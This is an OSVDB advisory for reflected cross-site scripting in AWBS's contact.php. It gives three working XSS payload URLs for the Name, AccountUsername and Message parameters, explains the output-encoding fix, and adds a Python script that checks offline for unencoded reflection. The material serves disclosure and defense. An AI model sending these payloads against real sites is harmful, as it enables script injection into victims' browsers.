AWBS contact.php Multiple Variable XSS

2006-07-29T08:34:09
ID OSVDB:27629
Type osvdb
Reporter newbinaryfile (newbinaryfile@gmail.com)
Modified 2006-07-29T08:34:09

Description

Vulnerability Description

AWBS (Advanced Webhost Billing System) contains a flaw that allows a remote cross-site scripting attack. The contact.php script writes the 'Name', 'AccountUsername' and 'Message' request parameters back into the response without validating or HTML-encoding them. A remote attacker could craft a URL that, when opened by a victim, executes arbitrary script in the victim's browser in the security context of the AWBS site, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue. The general fix for this class of flaw is to HTML-encode each parameter at the point where it is written into the page; in PHP that means htmlspecialchars() with ENT_QUOTES, because two of the affected values are reflected inside single-quoted attribute values and the default flags do not encode the single quote.

Short Description

AWBS contact.php fails to validate or encode the 'Name', 'AccountUsername' and 'Message' parameters, allowing remote cross-site scripting.

Manual Testing Notes

http://[target]/contact.php?action=submit&Name='><script>alert('XSS Vulnerability')%3B</script>&EmailAddress=1&AccountUsername=1&Message=1

http://[target]/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername='><script>alert('XSS Vulnerability')%3B</script>&Message=1

http://[target]/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername=1&Message=</textarea><script>alert('XSS Vulnerability')%3B</script>

The first two payloads begin with '> to close a single-quoted attribute value before opening a script element, which is the context in which 'Name' and 'AccountUsername' are reflected. The 'Message' payload instead begins with </textarea>, because its value is reflected inside a textarea element, where a script tag would otherwise be rendered as text rather than executed. %3B is the URL-encoded semicolon. A response in which <, > and ' come back HTML-encoded (&lt; &gt; &#039;) is not exploitable in these positions.
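The following is an added example, not code from the OSVDB entry or from AWBS. It turns the three manual test URLs above into an offline reflection check: it builds each probe URL, decodes the query as the server would, and reports a parameter as vulnerable only when the payload's breakout characters come back unencoded. Because the real application is not available here, two hypothetical renderers stand in for contact.php: render_vulnerable() copies the values verbatim into single-quoted attributes and a textarea (the contexts the payloads imply), and render_fixed() applies the output encoding the solution section describes. The host name target.example and both renderers are assumptions.

```python
"""Offline reflection check for the three contact.php parameters listed above.

Added example, not code from the OSVDB entry or from AWBS. render_vulnerable()
and render_fixed() are hypothetical stand-ins for contact.php output, and
target.example is a placeholder host.
"""
import html
from urllib.parse import parse_qs, urlencode, urlparse

# Payloads from the Manual Testing Notes; ';' becomes %3B once URL-encoded.
PROBES = {
    "Name": "'><script>alert('XSS Vulnerability');</script>",
    "AccountUsername": "'><script>alert('XSS Vulnerability');</script>",
    "Message": "</textarea><script>alert('XSS Vulnerability');</script>",
}

# Benign values for the remaining fields, matching the notes' use of "1".
BASE_PARAMS = {"action": "submit", "Name": "1", "EmailAddress": "1",
               "AccountUsername": "1", "Message": "1"}


def build_probe_url(target, param):
    """Return the test URL for one parameter; the others carry the benign value."""
    query = dict(BASE_PARAMS, **{param: PROBES[param]})
    return f"http://{target}/contact.php?{urlencode(query)}"


def render_vulnerable(params):
    """Hypothetical unpatched form: request values copied verbatim into HTML."""
    return (
        f"<input type='text' name='Name' value='{params['Name']}'>\n"
        f"<input type='text' name='AccountUsername' value='{params['AccountUsername']}'>\n"
        f"<textarea name='Message'>{params['Message']}</textarea>\n"
    )


def render_fixed(params):
    """Same form with output encoding. html.escape(quote=True) encodes < > & " '
    so a value can neither close the quoted attribute nor the textarea."""
    esc = {k: html.escape(v, quote=True) for k, v in params.items()}
    return (
        f"<input type='text' name='Name' value='{esc['Name']}'>\n"
        f"<input type='text' name='AccountUsername' value='{esc['AccountUsername']}'>\n"
        f"<textarea name='Message'>{esc['Message']}</textarea>\n"
    )


def reflected_unencoded(body, payload):
    """True when the payload survives in the response with its breakout
    characters (' > <) intact, which is what makes the reflection exploitable."""
    return payload in body


def probe(render, target="target.example"):
    """Run each probe URL through a renderer standing in for the server and
    return the set of parameters whose payload came back unencoded."""
    vulnerable = set()
    for param in PROBES:
        url = build_probe_url(target, param)
        # Decode the query string the way the server-side script would see it.
        params = {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}
        if reflected_unencoded(render(params), PROBES[param]):
            vulnerable.add(param)
    return vulnerable


if __name__ == "__main__":
    print("vulnerable:", sorted(probe(render_vulnerable)))  # all three parameters
    print("fixed:     ", sorted(probe(render_fixed)))       # none
```

Against a live host the renderer would be replaced by an HTTP GET of the probe URL; the check itself stays the same, since the question is only whether the reflected copy still contains the unencoded ' > and < that the payload needs.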

References:

Vendor URL: http://www.awbs.com/
Secunia Advisory ID: 21296
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0529.html
Keyword: Advanced Webhost Billing System
ISS X-Force ID: 28069
CVE ID: CVE-2006-3956